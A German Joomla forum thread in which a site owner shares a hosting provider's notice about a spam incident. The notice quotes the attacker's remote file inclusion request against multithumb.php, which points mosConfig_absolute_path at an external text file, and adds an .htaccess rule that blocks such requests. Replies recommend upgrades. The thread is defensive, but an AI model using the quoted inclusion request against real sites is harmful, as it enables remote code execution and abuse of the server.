Sicherheitslücke in Multithumb ?!?

**Airhead** · 03.07.2008 09:36

Hallo,
ich habe heute morgen folgende Mail von meinem Provider bekommen:

Code:

Hallo,
leider muss ich Sie wegen eines Spamvorfalls über Ihre Domain kontaktieren. 
Dabei nutzte ein Angreifer eine Sicherheitslücke in ihrem PHP-Script, um Spam 
über Ihre Domain zu verbreiten.

Aufruf über Browser des Angreifers:
powerboxer.de/mambots/content/multithumb.php?mosConfig_absolute_path=http://www.grupslactancia.info/id.txt??

Wir haben die Sicherheitslücke vorerst mittels einer .htaccess-Datei geschlossen. 
Desweiteren haben wir die IP des Angreifers gesperrt. Bitte prüfen Sie die 
Version Ihres Scriptes auf Aktualität! Sollte dies bereits die neueste Version 
sein, informieren Sie bitte den Entwickler über die Sicherheitslücke.

Inhalt der .htaccess-Datei:

RewriteEngine On
RewriteCond %{QUERY_STRING}   (.*)=http(.*)   [NC,OR]
RewriteCond %{QUERY_STRING}   (.*)urlx=(.*)   [NC]
RewriteRule ^(.*)  - [F]


Beschreibung:
RewriteCond %{QUERY_STRING}   (.*)=http(.*)/(.*)urlx=(.*) = kontrolliert den Inhalt nach index.php?XXXX darauf, ob eventuell eine externe Datei eingebunden wird mit index.php/site=http://xxxx.com/yyyy.php
[NC]= ignorieren der Groß und Kleinschreibung
RewriteRule ^(.*) - [F] = verbietet den Zugriff auf die Seite, wenn oben genannte RewriteCond zutrifft

(Ich hab den htaccess-code mit angegeben, vielleicht interessiert es ja jemanden)

Ist jemandem eine Sicherheitslücke bei Multithumb bekannt?
Die Datei wurde jedenfalls auf dem Server nicht angerührt und funktioniert auch.

Weitere Infos zur Seite:
Joomla!1.0.13
sef404
joomap
multithumb

Grüße,
Airhead

**Zorro** · 03.07.2008 10:57

Zitat von Airhead

Ist jemandem eine Sicherheitslücke bei Multithumb bekannt?

Ja, siehe hier: http://www.joomlaportal.de/sicherhei...ultithumb.html

Prüf mal Deine Version von Multithumb und upgrade, falls nötig.

Viele Grüße,
Zorro

**Airhead** · 03.07.2008 11:24

Zitat von Zorro

Prüf mal Deine Version von Multithumb und upgrade, falls nötig.

Danke für die Antwort und den Link.
Ich habe die aktuelle Version 2.0

Grüße,
Airhead

**keraM** · 03.07.2008 17:30

Eventuell Joomla auf .15 aktualisieren?

**Claudia E.** · 03.07.2008 17:34

Nutzt du wirklich SEF404? Das steht in der Liste der unsicheren Erweiterungen...
Bitte wechseln auf sh404Sef.

**Airhead** · 04.07.2008 16:37

Zitat von Claudia E.

Nutzt du wirklich SEF404?Bitte wechseln auf sh404Sef.

Hallo Claudia,
ich nutze natürlich sh404Sef, ...war ein Schreibfehler

Ok, ich habe mich nun ausführlicher mit dem Thema befasst.
Ich habe mir phpsecinfo auf meinen Webspace installiert um zu erfahren, welche Sicherheitslücken mein Provider offen hat.

Ergebnis: alles soweit ok bis auf 'allow_url_fopen'.
(Hier ist beschrieben, was allow_url_open on für Risiken birgt.)

Da ich keinen eigenen Server betreibe habe ich keinen Zugriff auf die php.ini.
Mit der .htaccess konnte ich das Loch auch nicht stopfen,
(php_flag allow_url_fopen off)
sodass ich meinen Provider allinkl anschrieb.
Sie können/wollen das nicht ändern, aber nachfolgender Eintrag in der .htaccess soll das Problem beheben:

Code:

RewriteEngine On
RewriteCond %{QUERY_STRING}   (.*)=http(.*)   [NC,OR]
RewriteCond %{QUERY_STRING}   (.*)urlx=(.*)   [NC]
RewriteRule ^(.*)  - [F]

Ich hoffe das hilf jemanden, der gleichartige Probleme hat

Gruß, Airhead

Thema: Sicherheitslücke in Multithumb ?!?

LinkBack

Themen-Optionen

Thema durchsuchen

Anzeige

Sicherheitslücke in Multithumb ?!?

Lesezeichen

Lesezeichen

Berechtigungen